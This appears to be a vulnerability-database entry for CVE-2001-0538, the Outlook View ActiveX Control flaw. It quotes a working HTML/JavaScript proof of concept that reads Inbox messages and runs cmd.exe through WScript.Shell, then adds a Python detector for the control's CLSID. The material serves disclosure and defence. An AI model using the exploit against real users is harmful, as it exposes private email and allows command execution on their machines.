Microsoft Outlook Unauthenticated Email Access Vulnerability

Vulnerability ID: 1106429    Vulnerability type: Access validation error
Published: 2001-07-12    Updated: 2005-05-02
CVE ID: CVE-2001-0538    CNNVD-ID: CNNVD-200108-053
Platform: Windows    CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/21003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-053
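|Vulnerability Details
A vulnerability exists in the Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier versions. A remote attacker can execute arbitrary commands by means of a malformed HTML email message or web page.
|Exploit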
source: http://www.securityfocus.com/bid/3025/info

Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can access and perform operations on user email through this control without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>
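
Because the control is reachable from any HTML that instantiates it by class ID, a mail or web content filter can flag `<object>` elements that load it. The following is an added example, not part of the original advisory or proof of concept: a Python check built on the standard-library HTML parser. The function and class names and both sample inputs are constructed for illustration; the CLSID is the one shown in the proof of concept above.

```python
from html.parser import HTMLParser

# CLSID of the Outlook View Control, copied from the proof of concept above.
OUTLOOK_VIEW_CLSID = "0006F063-0000-0000-C000-000000000046"

# Constructed sample inputs (not real mail).
SAMPLE_FLAGGED = (
    '<html><body>\n'
    '<OBJECT ID="o1"\n'
    ' CLASSID="clsid&#58;0006f063-0000-0000-c000-000000000046">\n'
    '<param name="folder" value="Inbox"></OBJECT></body></html>'
)
SAMPLE_CLEAN = (
    '<p>Advisory text mentioning clsid:0006F063-0000-0000-C000-000000000046</p>'
    '<object classid="clsid:11111111-2222-3333-4444-555555555555"></object>'
)

def normalize_classid(value):
    """Reduce a classid attribute to a bare upper-case GUID, or None."""
    value = (value or "").strip()
    if value[:6].lower() != "clsid:":
        return None
    # Tolerate surrounding whitespace, braces and mixed case.
    return value[6:].strip().strip("{}").upper()

class ObjectFinder(HTMLParser):
    """Collects <object> elements whose classid is the Outlook View Control."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and decodes character
        # references in attribute values, so "&#58;" arrives here as ":".
        if tag != "object":
            return
        attr = dict(attrs)
        if normalize_classid(attr.get("classid")) == OUTLOOK_VIEW_CLSID:
            self.hits.append({"id": attr.get("id"), "line": self.getpos()[0]})

def find_outlook_view_control(html):
    """Return one record per <object> element that instantiates the control."""
    finder = ObjectFinder()
    finder.feed(html)
    finder.close()
    return finder.hits
```

Matching on the parsed `classid` attribute rather than on a raw substring avoids flagging text that merely mentions the CLSID and still catches case changes and character-reference encoding of the attribute value.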
|References

Source: US-CERT Vulnerability Note: VU#131569
Name: VU#131569
Link: http://www.kb.cert.org/vuls/id/131569
Source: MS
Name: MS01-038
Link: http://www.microsoft.com/technet/security/bulletin/MS01-038.asp
Source: BUGTRAQ
Name: 20010712 MS Office XP - the more money I give to Microsoft, the more vulnerable my Windows computers are
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99496431214078&w=2
Source: XF
Name: outlook-activex-view-control(6831)
Link: http://xforce.iss.net/static/6831.php
Source: BID
Name: 3025
Link: http://www.securityfocus.com/bid/3025
Source: NTBUGTRAQ
Name: 20010712 Vulnerability in IE/Outlook ActiveX control
Link: http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0107&L=ntbugtraq&F=P&S=&P=862
Source: CIAC
Name: L-113
Link: http://www.ciac.org/ciac/bulletins/l-113.shtml